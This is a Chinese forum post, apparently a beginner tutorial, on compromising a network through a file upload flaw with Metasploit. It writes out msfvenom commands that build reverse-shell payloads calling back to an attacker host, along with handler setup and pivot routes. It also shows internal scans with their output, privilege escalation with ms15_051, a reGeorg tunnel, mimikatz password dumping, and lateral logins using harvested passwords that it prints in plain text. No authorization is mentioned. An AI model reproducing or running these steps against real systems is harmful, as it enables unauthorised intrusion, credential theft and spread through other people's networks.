Metasploit完整渗透 初级教学

admin

在http:xxxx.xxx.xx.xxx发现任意文件上传漏洞，果断上传webshell

首先用Metasploit生成反弹马，也就是生成反弹的payload：
成功生成反弹型payload：
（1）生成win下的exe
msfvenom -a x86 --platform win -p windows/meterpreter/reverse_tcp LHOST=192.168.1.109 LPORT=5566 -f exe x> /home/niexinming/back.exe
（2）生成win下的aspx
msfvenom -a x86 --platform win -p windows/meterpreter/reverse_tcp LHOST= 192.168.1.109 LPORT=7788 -f aspx x> /home/niexinming/back.aspx
其他的生成payload 的方法见：http://netsec.ws/?p=331

（3）我生成一个aspx的反弹马

然后启动msfconsole

(4）
本地监听，反弹后的控制端：use exploit/multi/handler

（5）
本地监听的确定用哪个payload：
set payload windows/meterpreter/reverse_tcp

（6）
设置本地监听的端口：
set lport 7788

（7）
设置本地的监听的地址：
set lhost 0.0.0.0

（8）
运行：
run

（9）访问生成的反弹马：
http://xxx.xxx.xx.xxx:/back.aspx

得到meterpreter的shell

[/url]
（10）
meterpreter查看路由：

run get_local_subnets

(11）
meterpreter 寻找putty保存的信息
run enum_putty

（12）meterpreter 寻找ie保存的密码
run post/windows/gather/enum_ie

（13）
meterpreter运行cmd

shell

退出cmd shell 为：ctrl+c
[url=http://static.wooyun.org/upload/image/201601/2016013121403047247.png]
(14)
把meterpreter放入后台：
background

（15）
添加路由（这样才能进行内网的扫描）：
route add 192.168.0.0 255.255.255.0 1
route add的第一个参数是地址，第二个参数地址是掩码，第三个参数是sessis的id
(在metasploit添加一个路由表，目的是访问10.1.1.129将通过meterpreter的会话 1 来访问：

1. route add 10.1.1.129 255.255.255.255 1

复制代码

这里如果要代理10.1.1.129/24 到session 1，则可以这么写

1. route add 10.1.1.0 255.255.255.0 1

复制代码

)
[/url]
（16）

进行内网的主机扫描：利用smb进行主机识别：
use auxiliary/scanner/smb/smb_version

先看看这个模块需要哪些参数

show options
[url=http://static.wooyun.org/upload/image/201601/2016013121421282394.png]
设置rhost

set rhosts 192.168.0.0/24

设置线程：
set threads 50

run
得到结果：
[/url]
（17）扫描端口：

use auxiliary/scanner/portscan/tcp

设置扫描的范围：

set rhosts 192.168.0.0/24

设置扫描的端口：
set ports 22,23,21,3389,1433,80,8080,81,82

设置线程：
set threads 50

运行：
run

运行结果：

192.168.0.7:23 - TCP OPEN

192.168.0.7:80 - TCP OPEN

192.168.0.18:3389 - TCP OPEN

192.168.0.9:80 - TCP OPEN

192.168.0.9:23 - TCP OPEN

192.168.0.18:1433 - TCP OPEN

192.168.0.5:23 - TCP OPEN

192.168.0.4:23 - TCP OPEN

192.168.0.4:80 - TCP OPEN

192.168.0.6:80 - TCP OPEN

192.168.0.5:80 - TCP OPEN

192.168.0.6:23 - TCP OPEN

Scanned  30 of 256 hosts (11% complete)

192.168.0.55:3389 - TCP OPEN

192.168.0.88:3389 - TCP OPEN

192.168.0.88:1433 - TCP OPEN

192.168.0.88:80 - TCP OPEN

Scanned  73 of 256 hosts (28% complete)

Scanned  81 of 256 hosts (31% complete)

192.168.0.120:80 - TCP OPEN

192.168.0.127:1433 - TCP OPEN

192.168.0.129:1433 - TCP OPEN

192.168.0.128:22 - TCP OPEN

192.168.0.129:80 - TCP OPEN

192.168.0.130:1433 - TCP OPEN

192.168.0.130:3389 - TCP OPEN

192.168.0.127:3389 - TCP OPEN

192.168.0.128:80 - TCP OPEN

192.168.0.135:8080 - TCP OPEN

192.168.0.129:3389 - TCP OPEN

192.168.0.130:8080 - TCP OPEN

192.168.0.134:3389 - TCP OPEN

192.168.0.135:3389 - TCP OPEN

192.168.0.135:1433 - TCP OPEN

192.168.0.131:1433 - TCP OPEN

192.168.0.135:80 - TCP OPEN

192.168.0.131:80 - TCP OPEN

192.168.0.139:80 - TCP OPEN

192.168.0.131:3389 - TCP OPEN

192.168.0.136:80 - TCP OPEN

192.168.0.139:1433 - TCP OPEN

192.168.0.136:8080 - TCP OPEN

192.168.0.136:3389 - TCP OPEN

192.168.0.136:1433 - TCP OPEN

192.168.0.139:3389 - TCP OPEN

192.168.0.139:8080 - TCP OPEN

192.168.0.120:22 - TCP OPEN

Scanned 111 of 256 hosts (43% complete)

Scanned 128 of 256 hosts (50% complete)

192.168.0.155:22 - TCP OPEN

192.168.0.160:1433 - TCP OPEN

192.168.0.160:21 - TCP OPEN

192.168.0.160:82 - TCP OPEN

192.168.0.160:22 - TCP OPEN

192.168.0.161:8080 - TCP OPEN

192.168.0.160:3389 - TCP OPEN

192.168.0.160:80 - TCP OPEN

192.168.0.175:80 - TCP OPEN

192.168.0.172:80 - TCP OPEN

192.168.0.172:82 - TCP OPEN

192.168.0.161:22 - TCP OPEN

192.168.0.161:80 - TCP OPEN

192.168.0.175:1433 - TCP OPEN

192.168.0.175:3389 - TCP OPEN

192.168.0.172:3389 - TCP OPEN

192.168.0.170:1433 - TCP OPEN

192.168.0.176:3389 - TCP OPEN

192.168.0.176:1433 - TCP OPEN

192.168.0.178:3389 - TCP OPEN

192.168.0.176:80 - TCP OPEN

192.168.0.177:1433 - TCP OPEN

192.168.0.178:1433 - TCP OPEN

192.168.0.170:80 - TCP OPEN

192.168.0.174:3389 - TCP OPEN

192.168.0.177:3389 - TCP OPEN

192.168.0.181:80 - TCP OPEN

192.168.0.181:3389 - TCP OPEN

192.168.0.174:80 - TCP OPEN

192.168.0.181:1433 - TCP OPEN

192.168.0.179:3389 - TCP OPEN

192.168.0.179:1433 - TCP OPEN

192.168.0.182:3389 - TCP OPEN

192.168.0.182:80 - TCP OPEN

192.168.0.185:3389 - TCP OPEN

192.168.0.185:1433 - TCP OPEN

192.168.0.189:80 - TCP OPEN

192.168.0.189:21 - TCP OPEN

192.168.0.189:22 - TCP OPEN

192.168.0.185:80 - TCP OPEN

192.168.0.189:8080 - TCP OPEN

192.168.0.189:3389 - TCP OPEN

192.168.0.191:80 - TCP OPEN

192.168.0.188:3389 - TCP OPEN

192.168.0.189:1433 - TCP OPEN

192.168.0.151:22 - TCP OPEN

192.168.0.170:3389 - TCP OPEN

192.168.0.181:8080 - TCP OPEN

192.168.0.179:80 - TCP OPEN

192.168.0.191:3389 - TCP OPEN

Scanned 172 of 256 hosts (67% complete)

Scanned 180 of 256 hosts (70% complete)

192.168.0.200:80 - TCP OPEN

192.168.0.201:22 - TCP OPEN

192.168.0.202:22 - TCP OPEN

192.168.0.203:8080 - TCP OPEN

192.168.0.206:22 - TCP OPEN

192.168.0.205:3389 - TCP OPEN

192.168.0.204:22 - TCP OPEN

192.168.0.216:22 - TCP OPEN

192.168.0.215:3389 - TCP OPEN

192.168.0.203:80 - TCP OPEN

192.168.0.218:80 - TCP OPEN

192.168.0.230:22 - TCP OPEN

192.168.0.233:8080 - TCP OPEN

192.168.0.237:3389 - TCP OPEN

192.168.0.231:22 - TCP OPEN

192.168.0.225:8080 - TCP OPEN

192.168.0.226:22 - TCP OPEN

192.168.0.225:22 - TCP OPEN

192.168.0.227:8080 - TCP OPEN

192.168.0.232:22 - TCP OPEN

192.168.0.236:22 - TCP OPEN

192.168.0.229:22 - TCP OPEN

192.168.0.223:22 - TCP OPEN

192.168.0.234:22 - TCP OPEN

192.168.0.235:3389 - TCP OPEN

192.168.0.205:80 - TCP OPEN

192.168.0.203:22 - TCP OPEN

192.168.0.207:22 - TCP OPEN

192.168.0.227:80 - TCP OPEN

192.168.0.224:22 - TCP OPEN

192.168.0.235:1433 - TCP OPEN

192.168.0.233:22 - TCP OPEN

192.168.0.235:80 - TCP OPEN

Scanned 226 of 256 hosts (88% complete)

192.168.0.238:80 - TCP OPEN

192.168.0.239:80 - TCP OPEN

192.168.0.242:80 - TCP OPEN

192.168.0.243:80 - TCP OPEN

192.168.0.241:80 - TCP OPEN

192.168.0.240:80 - TCP OPEN

192.168.0.253:23 - TCP OPEN

192.168.0.253:80 - TCP OPEN

192.168.0.254:23 - TCP OPEN

192.168.0.252:80 - TCP OPEN

192.168.0.252:23 - TCP OPEN

192.168.0.254:80 - TCP OPEN

Scanned 236 of 256 hosts (92% complete)

Scanned 256 of 256 hosts (100% complete)

Auxiliary module execution completed

在局域网里面寻找匿名ftp：
use auxiliary/scanner/ftp/anonymous

设置ip段：
set rhosts 192.168.0.0/24

设置线程：
set threads 50

运行结果：
[url=http://static.wooyun.org/upload/image/201601/2016013121432824242.png]

在webshell 里面
查看权限：

whoami

权限很高：

[/url]

如果权限低，则查看systeminfo

主要看里面打的补丁：

[url=http://static.wooyun.org/upload/image/201601/2016013121442330933.png]

补丁没有打，所以可以用ms15_051 这个exp秒掉

然后

添加一个账户

[/url]
然后上reGeorg

上传：

tunnel.aspx

然后：
访问：

http:xxx.xxx.xxx.xx/tunnel.aspx
然后发现：
Georg says, 'All seems fine'证明可以使用：

然后：
python reGeorgSocksProxy.py -p 1090 -u [url]http://xxx.xxx.xxx.xxx/download/tunnel.aspx

然后用proxychains访问远程桌面：

proxychains rdesktop -a 16 -u hehe -p Admin#123 127.0.0.1



[/url]




然后上传猕猴桃把密码搞出来：

[url=http://static.wooyun.org/upload/image/201601/2016013121453042480.png]


然后用管理员的账户登陆上去：

[/url]


然后开远程登陆记录，发现管理员用远程登陆记住了192.168.0.136的密码：

登陆上去，然后脱下来本机密码：



[url=http://static.wooyun.org/upload/image/201601/2016013121464733141.png]



截获一个密码是通用密码：

administraror

xseries_ellassay

登陆开了3389的主机


首先：

192.168.0.160

[/url]

然后：

192.168.0.170

用户名：xz
密码：xz

[url=http://static.wooyun.org/upload/image/201601/2016013121472979638.png]
用通用密码登陆192.168.0.181



[/url]


然后通用密码登陆192.168.0.170：


[url=http://static.wooyun.org/upload/image/201601/2016013121491687421.png]

厉害！学习学习

不错，感谢楼主分享，学习了